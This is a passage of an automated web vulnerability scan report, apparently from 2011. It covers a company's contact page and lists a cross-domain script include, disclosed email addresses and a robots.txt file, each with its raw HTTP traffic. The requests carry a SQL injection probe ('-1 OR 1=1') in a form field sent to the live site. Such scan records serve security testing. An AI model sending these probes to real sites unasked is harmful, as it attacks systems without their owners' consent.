User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=3r5e37bnivrlnt4tehl2ct1hl2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:23:49 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 5393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<me
...[SNIP]...
</script>

<script type="text/javascript"
src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
6.4. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /outsourcing-dot-net-development-contact-us.html HTTP/1.1
Referer: http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 112

p_name=-1+OR+1%3d1&p_email=netsparker%40example.com&p_company=3&p_telephone=3&p_validator=3&p_message=3&G=Submit

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:20:40 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 11371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
</script>

<script type="text/javascript"
src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
7. Email addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The following email addresses were disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

POST /outsourcing-dot-net-development-contact-us.html HTTP/1.1
Referer: http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.outsourcingdotnetdevelopment.com
Cookie: PHPSESSID=si2b4rb65grkvq4hqjlcca4jn1
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 112

p_name=-1+OR+1%3d1&p_email=netsparker%40example.com&p_company=3&p_telephone=3&p_validator=3&p_message=3&G=Submit

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:20:40 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 11371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
<strong>We can be reached via email at - sales@outsourcingdotnetdevelopment.com</strong>
...[SNIP]...
</strong> info@outsourcingdotnetdevelopment.com<br>
...[SNIP]...
</strong> support@outsourcingdotnetdevelopment.com<br>
...[SNIP]...
<input name="p_email" type="text" size="35" required="1" realname="Email Address" maxlength="200" value="netsparker@example.com" regexp="JSVAL_RX_EMAIL" style="border-style:solid;border-width:1px" />
...[SNIP]...
<a href="http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html" title=": info@outsourcingdotnetdevelopment.com">: info@outsourcingdotnetdevelopment.com</a>
...[SNIP]...
8. Robots.txt file  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.outsourcingdotnetdevelopment.com

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:20:41 GMT
Server: Apache
Last-Modified: Thu, 27 May 2010 09:48:00 GMT
ETag: "2d54077-36-4bfe3fd0"
Accept-Ranges: bytes
Content-Length: 54
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /link_resources.html
Allow: /
Report generated by XSS.CX at Sat Feb 19 10:57:25 CST 2011.